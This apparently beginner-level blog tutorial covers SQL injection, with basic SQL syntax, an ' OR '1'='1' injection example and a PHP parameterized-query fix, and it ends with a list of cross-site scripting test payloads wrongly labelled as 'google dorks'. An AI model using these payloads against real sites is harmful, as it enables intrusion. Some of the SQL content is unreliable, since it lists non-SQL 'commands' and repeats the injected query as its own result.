🔐Unlocking the Digital Gates: A Beginner’s Guide to SQL Injection 💉

 

What is SQL Injection ? (simple definition)

SQL Injection (SQLi) is a malicious technique wherein attackers exploit vulnerabilities in a web application’s input validation mechanisms to inject SQL code into the database queries. By manipulating user inputs, hackers can gain unauthorized access to databases, extract sensitive information, or even manipulate and delete data. Effective prevention involves robust input validation and parameterized queries to thwart these attacks and enhance overall cybersecurity.

Basic SQL Operations: Usage

Commands— — — -:: — — —— — -:: —— -Usage

INSERT — — — — — — — — — — — — — — — — — — — — — — — -> input
UPDATE — — — — — — — — — — — — — — — — — — — — — — — -> Modify
RETRIEVE — — — — — — — — — — — — — — — — — — — — — — > Fetch

DELETE — — — — — — — — — — — — — — — — — — — — — — — -> Remove
FILTER — — — — — — — — — — — — — — — — — — — — — — — — - -> Need
SORT — — — — — — — — — — — — — — — — — — — — — — — — — — > Arrange

ADDING — — — — — — — — — — — — — — — — — — — — — — — — — > Add
CREATE — — — — — — — — — — — — — — — — — — — — — — — — — — -> New table
JOIN — — — — — — — — — — — — — — — — — — — — — — — — —> Integrate/ Merge

SQL Queries

1. SELECT -: Retrieve the data from a database

SYNTAX :- SELECT column_name
FROM table_name

2.UPDATE -: Update Data in the database

SYNTAX :- UPDATE table_name
SET column_name = new_value
WHERE condition

The syntax for an SQL SELECT statement is as follows:

SELECT column1, column2, ... FROM table_name WHERE condition

• column1, column2, ... are the names of the columns to be retrieved from the table.
• table_name is the name of the table from which to retrieve data.
• WHERE is an optional clause that specifies the conditions that must be met for the rows to be selected.
• condition is the expression that defines the conditions for the rows to be selected.

For example, the following SQL statement retrieves all columns from the “customers” table where the “age” column is greater than or equal to 18:

SELECT * FROM customers WHERE age >= 18;

Demonstration On SQL Injections

-- This is an example of a SQL injection attack.
-- The following query is vulnerable to SQL injection:
SELECT * FROM users WHERE username = '$username';

-- An attacker can manipulate the $username variable to inject malicious SQL code:
SELECT * FROM users WHERE username = 'admin' OR '1'='1';

-- This would result in the SQL query being:
SELECT * FROM users WHERE username = 'admin' OR '1'='1';

-- This would return all users from the database, including the admin user.
-- To prevent SQL injection, you should use parameterized queries or prepared statements.

The following code demonstrates how to use parameterized queries in PHP:

// Using PDO to prepare and execute a parameterized query
$pdo = new PDO('mysql:host=localhost;dbname=test', 'username', 'password');
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');
$username = 'admin'; // This could be user input
$stmt->execute([$username]);
$users = $stmt->fetchAll();

This code ensures that the $username variable is treated as a parameter, not as part of the SQL query string, which prevents SQL injection.

How can i use an sql update statement to update data in a specific column of a table

To update a specific column in a table using SQL, you can use the UPDATE statement with the desired column and the new value, along with a WHERE clause to specify the rows to be updated. For example, to update the first_name column for a customer with ID 123 to "Tom", you would use the following SQL statement:

UPDATE Customers
SET first_name = 'Tom'
WHERE id = 123;

This statement will update only the row where the id column is equal to 123

.If you want to update multiple columns, you can include multiple SET clauses, but you still need a WHERE clause to specify the rows to be updated

some google dorks here: 
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script> 
<script>alert('XSS');</script>
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>      
<img src=xss onerror=alert(1)>